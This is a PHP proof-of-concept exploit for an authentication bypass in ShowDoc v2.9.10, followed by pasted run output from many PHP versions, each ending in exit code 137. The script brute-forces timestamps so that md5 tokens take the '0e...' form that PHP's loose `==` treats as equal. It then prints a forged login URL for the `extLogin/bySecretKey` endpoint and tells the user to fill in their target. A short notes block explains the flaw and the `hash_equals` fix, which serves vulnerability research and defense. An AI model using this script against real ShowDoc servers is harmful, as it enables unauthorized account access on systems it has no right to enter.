<?php
// Credit:Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
// Date:2021/10/13
/*
ShowDoc v2.9.10 Auth Bypass PoC #2:
1) PHP Type Juggling (weak typing), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
2) Using that:
('0e111' == '0e222') => (bool)true
3) This script uses brute force to find a possible collision

Reviewer notes (defensive context):
- The weakness relied on here is a loose `==` comparison between two md5 hex strings.
  When both operands look like numeric literals (a run of zeros, an `e`, then digits,
  e.g. `0e111`), PHP compares them as floats; both evaluate to 0.0 and the comparison
  is true even though the hashes differ.
- Mitigation on the application side: compare tokens with `hash_equals($expected, $given)`
  (strict and constant-time) or at minimum `===`; never `==`. Unlike the loose compare,
  neither treats two different hex digests as equal.
- This script only searches locally for a `time` value whose digest has that shape; it
  does not contact a server. The request it prints at the end is a single GET to
  `/server/?s=/api/extLogin/bySecretKey` with `username`, `time` and `token` parameters,
  which is the request pattern a defender would look for in access logs.
*/
$username = 's' ; // Forged username
$time = 1694131871 ; //2023-09-08 08:11:11, always valid timestamp
$login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; //a possible bin2hex( random_bytes( 16 ) );
$total = 1000000; // Iterations per progress line; the loop runs 1000 * $total = 1e9 iterations
for ($i=0; $i<(1000*$total); $i++){// try to Find solution in 1 Billion numbers!
$time += 1;
$token = md5($username.$login_secret_key.$time); // 32 lowercase hex chars
// Cheap prefilter: only digests beginning with "0e" can have the numeric-looking shape.
if (substr($token, 0, 2) === "0e"){
// Full check: only zeros before the 'e' and only digits after it, so that a loose
// `==` against any other such digest evaluates both sides to 0.0.
if(preg_match('/^[0]+e[0-9]+$/', $token)) //0e123, 00e123, ...
{
echo "time:$time, while final is: $token".PHP_EOL;
}
}
// Progress marker every $total iterations: $i/$total is the per-mille of 1e9 done.
if (($i % $total) == 0){
echo "[".($i/$total)."‰]".PHP_EOL;
}
}
echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target
?>
- Output for 8.1.26, 8.3.0
- [0‰]
[1‰]
[2‰]
[3‰]
[4‰]
[5‰]
[6‰]
[7‰]
[8‰]
[9‰]
Process exited with code 137. - Output for 8.1.25, 8.2.13
- [0‰]
[1‰]
[2‰]
[3‰]
[4‰]
[5‰]
[6‰]
[7‰]
[8‰]
[9‰]
[10‰]
Process exited with code 137. - Output for 8.2.12
- [0‰]
[1‰]
[2‰]
[3‰]
[4‰]
[5‰]
[6‰]
[7‰]
[8‰]
Process exited with code 137. - Output for 8.0.30, 8.1.23, 8.2.11
- [0‰]
[1‰]
[2‰]
[3‰]
[4‰]
[5‰]
[6‰]
[7‰]
Process exited with code 137. - Output for 7.3.0 - 7.3.22, 7.3.24 - 7.3.33, 7.4.0 - 7.4.25, 7.4.27 - 7.4.33, 8.0.0 - 8.0.29, 8.1.0, 8.1.2 - 8.1.22, 8.1.24, 8.2.0 - 8.2.10
- [0‰]
[1‰]
[2‰]
[3‰]
[4‰]
[5‰]
[6‰]
Process exited with code 137. - Output for 7.3.23, 7.4.26, 8.1.1
- [0‰]
[1‰]
[2‰]
[3‰]
[4‰]
[5‰]
Process exited with code 137.